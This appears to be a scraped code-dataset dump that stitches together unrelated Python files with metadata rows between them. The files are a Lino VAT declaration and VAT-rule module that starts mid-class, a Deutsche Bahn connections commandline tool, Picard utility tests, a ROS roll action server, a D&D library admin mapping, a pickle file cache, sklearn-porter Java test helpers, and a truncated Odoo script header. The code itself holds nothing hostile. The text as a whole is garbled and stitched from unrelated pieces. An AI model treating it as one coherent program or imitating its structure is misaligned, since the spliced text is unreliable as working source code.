required_roles = dd.login_required(LedgerStaff)
@dd.virtualfield(VatAreas.field())
def vat_area(cls, regime, ar):
return regime.vat_area
# @dd.virtualfield(dd.BooleanField(_("item VAT")))
# def item_vat(cls, regime, ar):
# return regime.item_vat
@dd.virtualfield(dd.BooleanField(_("Needs VAT id")))
def needs_vat_id(cls, regime, ar):
return regime.needs_vat_id
add = VatRegimes.add_item
add('10', _("Normal"), 'normal')
# re-populated in bevat and bevats.
# See also lino_xl.lib.vat.Plugin.default_vat_regime
#
class DeclarationField(dd.Choice):
editable = False
vat_regimes = None
exclude_vat_regimes = None
vat_classes = None
exclude_vat_classes = None
vat_columns = None
exclude_vat_columns = None
is_payable = False
# value dc vat_columns text fieldnames both_dc vat_regimes vat_classes
def __init__(self, value, dc,
vat_columns=None,
# is_base,
text=None,
fieldnames='',
both_dc=True,
vat_regimes=None, vat_classes=None,
**kwargs):
name = "F" + value
# text = string_concat("[{}] ".format(value), text)
self.help_text = text
super(DeclarationField, self).__init__(
value, "[{}]".format(value), name, **kwargs)
# self.is_base = is_base
self.fieldnames = fieldnames
self.vat_regimes = vat_regimes
self.vat_classes = vat_classes
self.vat_columns = vat_columns
self.dc = dc
self.both_dc = both_dc
def attach(self, choicelist):
self.minus_observed_fields = set()
self.observed_fields = []
for n in self.fieldnames.split():
if n.startswith('-'):
n = n[1:]
self.minus_observed_fields.add(n)
f = choicelist.get_by_value(n)
if f is None:
raise Exception(
"Invalid observed field {} for {}".format(n, self))
self.observed_fields.append(f)
if is_string(self.vat_regimes):
vat_regimes = self.vat_regimes
self.vat_regimes = set()
self.exclude_vat_regimes = set()
for n in vat_regimes.split():
if n.startswith('!'):
s = self.exclude_vat_regimes
n = n[1:]
else:
s = self.vat_regimes
v = VatRegimes.get_by_name(n)
if v is None:
raise Exception(
"Invalid VAT regime {} for field {}".format(
v, self.value))
s.add(v)
if len(self.vat_regimes) == 0:
self.vat_regimes = None
if len(self.exclude_vat_regimes) == 0:
self.exclude_vat_regimes = None
if is_string(self.vat_classes):
vat_classes = self.vat_classes
self.vat_classes = set()
self.exclude_vat_classes = set()
for n in vat_classes.split():
if n.startswith('!'):
s = self.exclude_vat_classes
n = n[1:]
else:
s = self.vat_classes
v = VatClasses.get_by_name(n)
if v is None:
raise Exception(
"Invalid VAT class {} for field {}".format(
v, self.value))
s.add(v)
if len(self.vat_classes) == 0:
self.vat_classes = None
if len(self.exclude_vat_classes) == 0:
self.exclude_vat_classes = None
# using VAT columns as selector is probably obsolete
if is_string(self.vat_columns):
vat_columns = self.vat_columns
self.vat_columns = set()
self.exclude_vat_columns = set()
for n in vat_columns.split():
if n.startswith('!'):
s = self.exclude_vat_columns
n = n[1:]
else:
s = self.vat_columns
v = VatColumns.get_by_value(n)
if v is None:
raise Exception(
"Invalid VAT column {} for field {}".format(
n, self.value))
s.add(v)
if len(self.vat_columns) == 0:
self.vat_columns = None
if len(self.exclude_vat_columns) == 0:
self.exclude_vat_columns = None
super(DeclarationField, self).attach(choicelist)
def get_model_field(self):
return dd.PriceField(
self.text, default=Decimal, editable=self.editable,
help_text=self.help_text)
# def __str__(self):
# # return force_str(self.text, errors="replace")
# # return self.text
# return "[{}] {}".format(self.value, self.text)
def collect_from_movement(self, dcl, mvt, field_values, payable_sums):
pass
def collect_from_sums(self, dcl, sums, payable_sums):
pass
class SumDeclarationField(DeclarationField):
def __init__(self, *args, **kwargs):
super(SumDeclarationField, self).__init__(*args, **kwargs)
if self.is_payable:
raise Exception("SumDeclarationField may not be payable")
def collect_from_sums(self, dcl, field_values, payable_sums):
tot = Decimal()
for f in self.observed_fields:
v = field_values[f.name]
if f.value in self.minus_observed_fields:
v = -v
tot += v
# if f.dc == self.dc:
# tot += v
# else:
# tot -= v
field_values[self.name] = tot
class WritableDeclarationField(DeclarationField):
editable = True
def collect_from_sums(self, dcl, field_values, payable_sums):
if self.is_payable:
amount = field_values[self.name]
if amount:
if self.dc == dcl.journal.dc:
amount = - amount
k = ((dcl.journal.account, None), None, None, None)
payable_sums.collect(k, amount)
class MvtDeclarationField(DeclarationField):
def collect_from_movement(self, dcl, mvt, field_values, payable_sums):
# if not mvt.account.declaration_field in self.observed_fields:
# return 0
if self.vat_classes is not None:
if not mvt.vat_class in self.vat_classes:
return
if self.exclude_vat_classes is not None:
if mvt.vat_class in self.exclude_vat_classes:
return
if self.vat_columns is not None:
if not mvt.account.vat_column in self.vat_columns:
return
if self.exclude_vat_columns is not None:
if mvt.account.vat_column in self.exclude_vat_columns:
return
if self.vat_regimes is not None:
if not mvt.vat_regime in self.vat_regimes:
return
if self.exclude_vat_regimes is not None:
if mvt.vat_regime in self.exclude_vat_regimes:
return
amount = mvt.amount
if not amount:
return
if self.dc == DC.debit:
amount = -amount
if amount < 0 and not self.both_dc:
return
field_values[self.name] += amount
if self.is_payable:
if self.dc == dcl.journal.dc:
amount = - amount
# k = ((mvt.account, None), mvt.project, mvt.vat_class, mvt.vat_regime)
k = ((mvt.account, None), None, None, None)
payable_sums.collect(k, amount)
# k = (dcl.journal.account, None, None, None)
# payable_sums.collect(k, amount)
# class AccountDeclarationField(MvtDeclarationField):
# pass
# def __init__(self, value, dc, vat_columns, *args, **kwargs):
# # kwargs.update(fieldnames=value)
# kwargs.update(vat_columns=vat_columns)
# super(AccountDeclarationField, self).__init__(
# value, dc, *args, **kwargs)
class DeclarationFieldsBase(dd.ChoiceList):
verbose_name_plural = _("Declaration fields")
item_class = DeclarationField
column_names = "value name text description *"
# @classmethod
# def add_account_field(cls, *args, **kwargs):
# cls.add_item_instance(
# AccountDeclarationField(*args, **kwargs))
@classmethod
def add_mvt_field(cls, *args, **kwargs):
cls.add_item_instance(
MvtDeclarationField(*args, **kwargs))
@classmethod
def add_sum_field(cls, *args, **kwargs):
cls.add_item_instance(
SumDeclarationField(*args, **kwargs))
@classmethod
def add_writable_field(cls, *args, **kwargs):
cls.add_item_instance(
WritableDeclarationField(*args, **kwargs))
@dd.displayfield(_("Description"))
def description(cls, fld, ar):
if ar is None:
return ''
elems = [fld.help_text, E.br()]
def x(label, lst, xlst):
if lst is None:
spec = ''
else:
lst = sorted([i.name or i.value for i in lst])
spec = ' '.join(lst)
if xlst is not None:
xlst = sorted(["!"+(i.name or i.value) for i in xlst])
spec += ' ' + ' '.join(xlst)
spec = spec.strip()
if spec:
elems.extend([label, " ", spec, E.br()])
x(_("columns"), fld.vat_columns, fld.exclude_vat_columns)
x(_("regimes"), fld.vat_regimes, fld.exclude_vat_regimes)
x(_("classes"), fld.vat_classes, fld.exclude_vat_classes)
elems += [
fld.__class__.__name__, ' ',
str(fld.dc),
"" if fld.both_dc else " only",
E.br()]
if len(fld.observed_fields):
names = []
for f in fld.observed_fields:
n = f.value
if f.value in fld.minus_observed_fields:
n = "- " + n
elif len(names) > 0:
n = "+ " + n
names.append(n)
elems += ['= ', ' '.join(names), E.br()]
return E.div(*forcetext(elems))
class VatRule(dd.Choice):
start_date = None
end_date= None
vat_area = None
trade_type = None
vat_class = None
vat_regime = None
rate = ZERO
vat_account = None
# vat_returnable = None
vat_returnable_account = None
def __init__(self,
vat_class=None, rate=None,
vat_area=None, trade_type=None,
vat_regime=None, vat_account=None,
vat_returnable_account=None):
kw = dict(vat_area=vat_area)
if rate is not None:
kw.update(rate=Decimal(rate))
# if vat_returnable is None:
# vat_returnable = vat_returnable_account is not None
# kw.update(vat_returnable=vat_returnable)
if trade_type:
kw.update(trade_type=TradeTypes.get_by_name(trade_type))
if vat_regime:
kw.update(vat_regime=VatRegimes.get_by_name(vat_regime))
if vat_class:
kw.update(vat_class=VatClasses.get_by_name(vat_class))
if vat_account:
kw.update(vat_account=vat_account)
if vat_returnable_account:
kw.update(vat_returnable_account=vat_returnable_account)
# text = "{trade_type} {vat_area} {vat_class} {rate}".format(**kw)
super(VatRule, self).__init__(None, None, **kw)
def __str__(rule):
lst = []
only = []
lst.append(gettext("VAT rule {}: ".format(rule.value)))
if rule.trade_type is not None:
only.append(str(rule.trade_type))
if rule.vat_regime is not None:
only.append(str(rule.vat_regime))
if rule.vat_area is not None:
only.append(str(rule.vat_area))
if rule.vat_class is not None:
only.append(str(rule.vat_class))
if len(only):
lst.append(gettext("if ({}) then".format(', '.join(only))))
lst.append(gettext("apply {} %".format(rule.rate)))
lst.append(gettext("and book to {}").format(rule.vat_account))
if rule.vat_returnable_account is not None:
lst.append(gettext("(return to {})").format(rule.vat_returnable_account))
return '\n'.join(lst)
# kw = dict(
# trade_type=self.trade_type,
# vat_regime=self.vat_regime,
# vat_class=self.vat_class,
# rate=self.rate,
# vat_area=self.vat_area, seqno=self.seqno)
# return "{trade_type} {vat_area} {vat_class} {rate}".format(**kw)
class VatRules(dd.ChoiceList):
verbose_name = _("VAT rule")
verbose_name_plural = _("VAT rules")
item_class = VatRule
column_names = "value description"
@classmethod
def get_vat_rule(
cls, vat_area,
trade_type=None, vat_regime=None, vat_class=None,
date=None, default=models.NOT_PROVIDED):
for i in cls.get_list_items():
if i.vat_area is not None and vat_area != i.vat_area:
continue
if i.trade_type is not None and trade_type != i.trade_type:
continue
if i.vat_class is not None and vat_class != i.vat_class:
continue
if i.vat_regime is not None and vat_regime != i.vat_regime:
continue
if date is not None:
if i.start_date and i.start_date > date:
continue
if i.end_date and i.end_date < date:
continue
return i
if default is models.NOT_PROVIDED:
msg = _("No VAT rule for ({!r},{!r},{!r},{!r},{!r})").format(
trade_type, vat_class, vat_area, vat_regime,
dd.fds(date))
if False:
dd.logger.info(msg)
else:
raise Warning(msg)
return default
@dd.displayfield(_("Description"))
def description(cls, rule, ar):
return str(rule)
# we add a single rule with no rate and no conditions, iow any combination is
# allowed and no vat is applied. The declaration modules will clear this list
# and fill it with their rules.
VatRules.add_item()
|
bsd-2-clause
| 90,297,768,270,596,420 | 33.736434 | 93 | 0.55077 | false |
mackaiver/sEins-Module
|
cmd_line/seins_cmd.py
|
1
|
3548
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = 'mackaiver'
#Lets start with a simple commandline tool
import argparse
import os
from colorama import init, Fore, Style
from seins.PageParser import DBPageParser, PageContentError
from seins.HtmlFetcher import FetcherException
#init colorama so it works on windows as well.
#The autoreset flag keeps me from using RESET on each line I want to color
init(autoreset=True)
import logging
#create a logger for this module
logger = logging.getLogger(__name__)
#the usual formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# create a handler and make it use the formatter
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# now tell the logger to use the handler
logger.addHandler(handler)
logger.propagate = False
def is_valid_file(parser, arg):
(folder, t) = os.path.split(arg)
#logger.debug('given path is:' + os.path.split(arg))
if not folder == '' and not os.path.exists(folder):
parser.error("The folder %s does not exist!" % folder)
else:
return arg
def parse_args():
p = argparse.ArgumentParser(description='Lecker data fetching from EFA via the commandline. ',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('-d', default='Universität s-Bahnhof, Dortmund', metavar='--departing_station', type=str,
help='Name of the departing station')
p.add_argument('-a', default='Dortmund hbf', metavar='--arrival_station', type=str,
help='Name of the arrival station')
p.add_argument('-o', metavar='--output', type=lambda path: is_valid_file(p, path), help='will write the html '
'fetched from the dbwebsite'
' to the given path')
p.add_argument('-v', action="store_true", help='Show some debug and info logging output')
p.add_argument('-s', action="store_true", help='only display S-Bahn connections')
args = p.parse_args()
#check for debug logging
if args.v:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARN)
return args.o, args.d, args.a, args.s
def main():
(output_path, departure, arrival, sbahn_only) = parse_args()
connections = []
try:
page = DBPageParser(departure, arrival)
connections = page.connections
if output_path:
with open(output_path, 'wt') as file:
file.write(page.html)
logger.info("Output written to " + output_path)
except PageContentError as e:
logger.error('Webpage returned an error message: ' + str(e))
except FetcherException as e:
logger.error('Fetcher could not get valid response from server: ' + str(e))
#do some pretty printing
print('Connections from: ' + Style.BRIGHT + departure + Style.RESET_ALL +
' to: ' + Style.BRIGHT + arrival)
print(' departure, arrival, delay, connection')
for (d, a, delay, t) in connections:
if sbahn_only and not t.strip() is 'S':
continue
if delay and int(delay) >= 5:
print(d + ', ' + a + ', ' + Fore.RED + delay + Fore.RESET + ', ' + t)
else:
print(d + ', ' + a + ', ' + str(delay) + ', ' + t)
if __name__ == '__main__':
main()
|
mit
| -5,232,060,154,381,828,000 | 34.118812 | 120 | 0.604736 | false |
antlarr/picard
|
test/test_utils.py
|
1
|
12813
|
# -*- coding: utf-8 -*-
import builtins
from collections import namedtuple
import os.path
from test.picardtestcase import PicardTestCase
import unittest
from picard import util
from picard.const.sys import IS_WIN
from picard.util import (
find_best_match,
imageinfo,
sort_by_similarity,
)
# ensure _() is defined
if '_' not in builtins.__dict__:
builtins.__dict__['_'] = lambda a: a
class ReplaceWin32IncompatTest(PicardTestCase):
@unittest.skipUnless(IS_WIN, "windows test")
def test_correct_absolute_win32(self):
self.assertEqual(util.replace_win32_incompat("c:\\test\\te\"st/2"),
"c:\\test\\te_st/2")
self.assertEqual(util.replace_win32_incompat("c:\\test\\d:/2"),
"c:\\test\\d_/2")
@unittest.skipUnless(not IS_WIN, "non-windows test")
def test_correct_absolute_non_win32(self):
self.assertEqual(util.replace_win32_incompat("/test/te\"st/2"),
"/test/te_st/2")
self.assertEqual(util.replace_win32_incompat("/test/d:/2"),
"/test/d_/2")
def test_correct_relative(self):
self.assertEqual(util.replace_win32_incompat("A\"*:<>?|b"),
"A_______b")
self.assertEqual(util.replace_win32_incompat("d:tes<t"),
"d_tes_t")
def test_incorrect(self):
self.assertNotEqual(util.replace_win32_incompat("c:\\test\\te\"st2"),
"c:\\test\\te\"st2")
class SanitizeDateTest(PicardTestCase):
def test_correct(self):
self.assertEqual(util.sanitize_date("2006--"), "2006")
self.assertEqual(util.sanitize_date("2006--02"), "2006")
self.assertEqual(util.sanitize_date("2006 "), "2006")
self.assertEqual(util.sanitize_date("2006 02"), "")
self.assertEqual(util.sanitize_date("2006.02"), "")
self.assertEqual(util.sanitize_date("2006-02"), "2006-02")
def test_incorrect(self):
self.assertNotEqual(util.sanitize_date("2006--02"), "2006-02")
self.assertNotEqual(util.sanitize_date("2006.03.02"), "2006-03-02")
class TranslateArtistTest(PicardTestCase):
def test_latin(self):
self.assertEqual(u"Jean Michel Jarre", util.translate_from_sortname(u"Jean Michel Jarre", u"Jarre, Jean Michel"))
self.assertNotEqual(u"Jarre, Jean Michel", util.translate_from_sortname(u"Jean Michel Jarre", u"Jarre, Jean Michel"))
def test_kanji(self):
self.assertEqual(u"Tetsuya Komuro", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
self.assertNotEqual(u"Komuro, Tetsuya", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
self.assertNotEqual(u"小室哲哉", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
def test_kanji2(self):
self.assertEqual(u"Ayumi Hamasaki & Keiko", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
self.assertNotEqual(u"浜崎あゆみ & KEIKO", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
self.assertNotEqual(u"Hamasaki, Ayumi & Keiko", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
def test_cyrillic(self):
self.assertEqual(U"Pyotr Ilyich Tchaikovsky", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
self.assertNotEqual(u"Tchaikovsky, Pyotr Ilyich", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
self.assertNotEqual(u"Пётр Ильич Чайковский", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
class FormatTimeTest(PicardTestCase):
def test(self):
self.assertEqual("?:??", util.format_time(0))
self.assertEqual("3:00", util.format_time(179750))
self.assertEqual("3:00", util.format_time(179500))
self.assertEqual("2:59", util.format_time(179499))
self.assertEqual("59:59", util.format_time(3599499))
self.assertEqual("1:00:00", util.format_time(3599500))
self.assertEqual("1:02:59", util.format_time(3779499))
class HiddenFileTest(PicardTestCase):
@unittest.skipUnless(not IS_WIN, "non-windows test")
def test(self):
self.assertTrue(util.is_hidden('/a/b/.c.mp3'))
self.assertTrue(util.is_hidden('/a/.b/.c.mp3'))
self.assertFalse(util.is_hidden('/a/.b/c.mp3'))
class TagsTest(PicardTestCase):
def test_display_tag_name(self):
dtn = util.tags.display_tag_name
self.assertEqual(dtn('tag'), 'tag')
self.assertEqual(dtn('tag:desc'), 'tag [desc]')
self.assertEqual(dtn('tag:'), 'tag')
self.assertEqual(dtn('originalyear'), 'Original Year')
self.assertEqual(dtn('originalyear:desc'), 'Original Year [desc]')
self.assertEqual(dtn('~length'), 'Length')
self.assertEqual(dtn('~lengthx'), '~lengthx')
self.assertEqual(dtn(''), '')
class LinearCombinationTest(PicardTestCase):
def test_0(self):
parts = []
self.assertEqual(util.linear_combination_of_weights(parts), 0.0)
def test_1(self):
parts = [(1.0, 1), (1.0, 1), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 1.0)
def test_2(self):
parts = [(0.0, 1), (0.0, 0), (1.0, 0)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.0)
def test_3(self):
parts = [(0.0, 1), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.5)
def test_4(self):
parts = [(0.5, 4), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.6)
def test_5(self):
parts = [(0.95, 100), (0.05, 399), (0.0, 1), (1.0, 0)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.2299)
def test_6(self):
parts = [(-0.5, 4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_7(self):
parts = [(0.5, -4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_8(self):
parts = [(1.5, 4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_9(self):
parts = ((1.5, 4))
self.assertRaises(TypeError, util.linear_combination_of_weights, parts)
class AlbumArtistFromPathTest(PicardTestCase):
def test_album_artist_from_path(self):
aafp = util.album_artist_from_path
file_1 = r"/10cc/Original Soundtrack/02 I'm Not in Love.mp3"
file_2 = r"/10cc - Original Soundtrack/02 I'm Not in Love.mp3"
file_3 = r"/Original Soundtrack/02 I'm Not in Love.mp3"
file_4 = r"/02 I'm Not in Love.mp3"
self.assertEqual(aafp(file_1, '', ''), ('Original Soundtrack', '10cc'))
self.assertEqual(aafp(file_2, '', ''), ('Original Soundtrack', '10cc'))
self.assertEqual(aafp(file_3, '', ''), ('Original Soundtrack', ''))
self.assertEqual(aafp(file_4, '', ''), ('', ''))
self.assertEqual(aafp(file_1, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_2, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_3, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_4, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_1, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_2, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_3, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_4, '', 'artist'), ('', 'artist'))
self.assertEqual(aafp(file_1, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_2, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_3, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_4, 'album', 'artist'), ('album', 'artist'))
class ImageInfoTest(PicardTestCase):
def test_gif(self):
file = os.path.join('test', 'data', 'mb.gif')
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/gif', '.gif', 5806)
)
def test_png(self):
file = os.path.join('test', 'data', 'mb.png')
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/png', '.png', 11137)
)
def test_jpeg(self):
file = os.path.join('test', 'data', 'mb.jpg',)
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/jpeg', '.jpg', 8550)
)
def test_not_enough_data(self):
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, "x")
self.assertRaises(imageinfo.NotEnoughData, imageinfo.identify, "x")
def test_invalid_data(self):
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, "x" * 20)
self.assertRaises(imageinfo.UnrecognizedFormat,
imageinfo.identify, "x" * 20)
def test_invalid_png_data(self):
data = '\x89PNG\x0D\x0A\x1A\x0A' + "x" * 20
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, data)
self.assertRaises(imageinfo.UnrecognizedFormat,
imageinfo.identify, data)
class CompareBarcodesTest(unittest.TestCase):
def test_same(self):
self.assertTrue(util.compare_barcodes('0727361379704', '0727361379704'))
self.assertTrue(util.compare_barcodes('727361379704', '727361379704'))
self.assertTrue(util.compare_barcodes('727361379704', '0727361379704'))
self.assertTrue(util.compare_barcodes('0727361379704', '727361379704'))
self.assertTrue(util.compare_barcodes(None, None))
self.assertTrue(util.compare_barcodes('', ''))
self.assertTrue(util.compare_barcodes(None, ''))
self.assertTrue(util.compare_barcodes('', None))
def test_not_same(self):
self.assertFalse(util.compare_barcodes('0727361379704', '0727361379705'))
self.assertFalse(util.compare_barcodes('727361379704', '1727361379704'))
self.assertFalse(util.compare_barcodes('0727361379704', None))
self.assertFalse(util.compare_barcodes(None, '0727361379704'))
class MbidValidateTest(unittest.TestCase):
def test_ok(self):
self.assertTrue(util.mbid_validate('2944824d-4c26-476f-a981-be849081942f'))
self.assertTrue(util.mbid_validate('2944824D-4C26-476F-A981-be849081942f'))
self.assertFalse(util.mbid_validate(''))
self.assertFalse(util.mbid_validate('Z944824d-4c26-476f-a981-be849081942f'))
self.assertFalse(util.mbid_validate('22944824d-4c26-476f-a981-be849081942f'))
self.assertFalse(util.mbid_validate('2944824d-4c26-476f-a981-be849081942ff'))
self.assertFalse(util.mbid_validate('2944824d-4c26.476f-a981-be849081942f'))
def test_not_ok(self):
self.assertRaises(TypeError, util.mbid_validate, 123)
self.assertRaises(TypeError, util.mbid_validate, None)
SimMatchTest = namedtuple('SimMatchTest', 'similarity name')
class SortBySimilarity(unittest.TestCase):
def setUp(self):
self.test_values = [
SimMatchTest(similarity=0.74, name='d'),
SimMatchTest(similarity=0.61, name='a'),
SimMatchTest(similarity=0.75, name='b'),
SimMatchTest(similarity=0.75, name='c'),
]
def candidates(self):
for value in self.test_values:
yield value
def test_sort_by_similarity(self):
results = [result.name for result in sort_by_similarity(self.candidates)]
self.assertEqual(results, ['b', 'c', 'd', 'a'])
def test_findbestmatch(self):
no_match = SimMatchTest(similarity=-1, name='no_match')
best_match = find_best_match(self.candidates, no_match)
self.assertEqual(best_match.result.name, 'b')
self.assertEqual(best_match.similarity, 0.75)
self.assertEqual(best_match.num_results, 4)
def test_findbestmatch_nomatch(self):
self.test_values = []
no_match = SimMatchTest(similarity=-1, name='no_match')
best_match = find_best_match(self.candidates, no_match)
self.assertEqual(best_match.result.name, 'no_match')
self.assertEqual(best_match.similarity, -1)
self.assertEqual(best_match.num_results, 0)
|
gpl-2.0
| -1,191,016,911,811,311,600 | 39.854839 | 143 | 0.62274 | false |
tsender/riptide_software
|
riptide_controllers/action/goToRoll.py
|
1
|
1173
|
#! /usr/bin/env python
import rospy
import actionlib
from riptide_msgs.msg import AttitudeCommand, Imu
import riptide_controllers.msg
def angleDiff(a1, a2):
return (a1 - a2 + 180) % 360 - 180
class GoToRollAction(object):
def __init__(self):
self.rollPub = rospy.Publisher("/command/roll", AttitudeCommand, queue_size=1)
self._as = actionlib.SimpleActionServer("go_to_roll", riptide_controllers.msg.GoToRollAction, execute_cb=self.execute_cb, auto_start=False)
self._as.start()
def execute_cb(self, goal):
rospy.loginfo("Going to Roll " + str(goal.roll)+ " deg")
self.rollPub.publish(goal.roll, AttitudeCommand.POSITION)
while abs(angleDiff(rospy.wait_for_message("/state/imu", Imu).rpy_deg.x, goal.roll)) > 5:
rospy.sleep(0.05)
if self._as.is_preempt_requested():
rospy.loginfo('Preempted Go To Roll')
self._as.set_preempted()
return
rospy.loginfo("At Roll")
self._as.set_succeeded()
if __name__ == '__main__':
rospy.init_node('go_to_roll')
server = GoToRollAction()
rospy.spin()
|
bsd-2-clause
| -3,178,892,167,043,033,000 | 29.894737 | 147 | 0.615516 | false |
Saevon/webdnd
|
dnd/admin/__init__.py
|
1
|
1311
|
"""
Library admin site
"""
from dnd.admin.base import LibraryAdmin
from dnd.models.accounts import LibraryAccount
from dnd.models.library_entities.conditions import Condition
from dnd.models.library_entities.abilities import Ability, AbilityType
from dnd.models.library_entities.references import Article, Example, Rule, Term
from dnd.models.library_entities.skills import Skill, SkillSample
from dnd.models.library_entities.spells import CastingLevelClassPair, Spell, SpellDescriptor
from dnd.models.library_entities.classes import DnDClass
from dnd.models.units import ActionTimeDuration
from dnd.models.modifiers.saving_throws import SavingThrow
from dnd.models.modifiers.modifiers import Modifier
from dnd.models.sources import Source
DEFAULT = LibraryAdmin
library_admin_mapping = (
(ActionTimeDuration, DEFAULT),
(Article, DEFAULT),
(CastingLevelClassPair, DEFAULT),
(Condition, DEFAULT),
(DnDClass, DEFAULT),
(Example, DEFAULT),
(Ability, DEFAULT),
(AbilityType, DEFAULT),
(LibraryAccount, DEFAULT),
(Modifier, DEFAULT),
(Rule, DEFAULT),
(SavingThrow, DEFAULT),
(Skill, DEFAULT),
(SkillSample, DEFAULT),
(Source, DEFAULT),
(Spell, DEFAULT),
(SpellDescriptor, DEFAULT),
(Term, DEFAULT),
)
__all__ = [
library_admin_mapping
]
|
mit
| 4,420,922,745,493,548,500 | 29.488372 | 92 | 0.750572 | false |
reinforceio/tensorforce-benchmark
|
rl_benchmark/db/cache.py
|
1
|
2832
|
# Copyright 2018 The RLgraph project. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Database cache class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import os
import pickle
import re
from distutils.dir_util import mkpath
def get_cache_file_name(identifier):
return re.sub('[\W_]+', '_', identifier)
class Cache(object):
"""
Database cache class to store get requests. Since we assume that individual benchmarks are immutable, there
is no need to fetch them more than once from the database.
"""
def __init__(self, cache_path='~/.cache/reinforce.io/general/'):
self.cache_path = os.path.expanduser(cache_path)
def _get_cache_file_path(self, identifier):
"""
Return full cache file path.
Args:
identifier: object identifier (e.g. URL)
Returns: full path
"""
cache_file_name = get_cache_file_name(identifier)
cache_file_path = os.path.join(self.cache_path, cache_file_name)
return cache_file_path
def get(self, identifier):
"""
Get object from cache.
Args:
identifier: object identifier (e.g. URL)
Returns: cached object
"""
cache_file_path = self._get_cache_file_path(identifier)
if os.path.isfile(cache_file_path):
with open(cache_file_path, 'rb') as fp:
result = pickle.load(fp)
return result
return None
def save(self, data, identifier):
"""
Save object to cache.
Args:
data: object to cache
identifier: object identifier (e.g. URL)
Returns: boolean
"""
cache_file_path = self._get_cache_file_path(identifier)
# Create path directory
if not os.path.isdir(self.cache_path):
logging.info("Creating cache directory at {}".format(self.cache_path))
mkpath(self.cache_path, 0o755)
with open(cache_file_path, 'wb') as fp:
logging.debug("Storing result in cache file at {}".format(cache_file_path))
pickle.dump(data, fp)
return True
|
apache-2.0
| -7,377,568,597,197,831,000 | 27.039604 | 111 | 0.617938 | false |
nok/sklearn-porter
|
tests/language/Java.py
|
1
|
2036
|
# -*- coding: utf-8 -*-
import os
from sklearn_porter import Porter
from sklearn_porter.utils.Environment import Environment
from sklearn_porter.utils.Shell import Shell
class Java(object):
LANGUAGE = 'java'
# noinspection PyPep8Naming
def setUp(self):
Environment.check_deps(['mkdir', 'rm', 'java', 'javac'])
self._init_test()
def _init_test(self):
self.tmp_fn = 'Brain'
def _port_estimator(self, export_data=False, embed_data=False):
self.estimator.fit(self.X, self.y)
Shell.call('rm -rf tmp')
Shell.call('mkdir tmp')
filename = self.tmp_fn + '.java'
path = os.path.join('tmp', filename)
with open(path, 'w') as f:
porter = Porter(self.estimator, language=self.LANGUAGE)
if export_data:
out = porter.export(class_name='Brain',
method_name='foo',
export_data=True,
export_dir='tmp')
else:
out = porter.export(class_name='Brain',
method_name='foo',
embed_data=embed_data)
f.write(out)
if export_data:
cmd = 'javac -cp ./gson.jar {}'.format(path)
Shell.call(cmd)
else:
cmd = 'javac ' + path
Shell.call(cmd)
def pred_in_py(self, features, cast=True):
pred = self.estimator.predict([features])[0]
return int(pred) if cast else float(pred)
def pred_in_custom(self, features, cast=True, export_data=False):
if export_data:
cmd = 'java -cp ./gson.jar:./tmp {}'.format(self.tmp_fn).split()
cmd += ['./tmp/data.json']
else:
cmd = 'java -classpath tmp {}'.format(self.tmp_fn).split()
args = [str(f).strip() for f in features]
cmd += args
pred = Shell.check_output(cmd)
return int(pred) if cast else float(pred)
|
mit
| -9,213,031,744,138,941,000 | 32.933333 | 76 | 0.523084 | false |
grap/odoo-script
|
data_integration/per_activity/TED_configuration.py
|
1
|
2606
|
#! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Global Settings
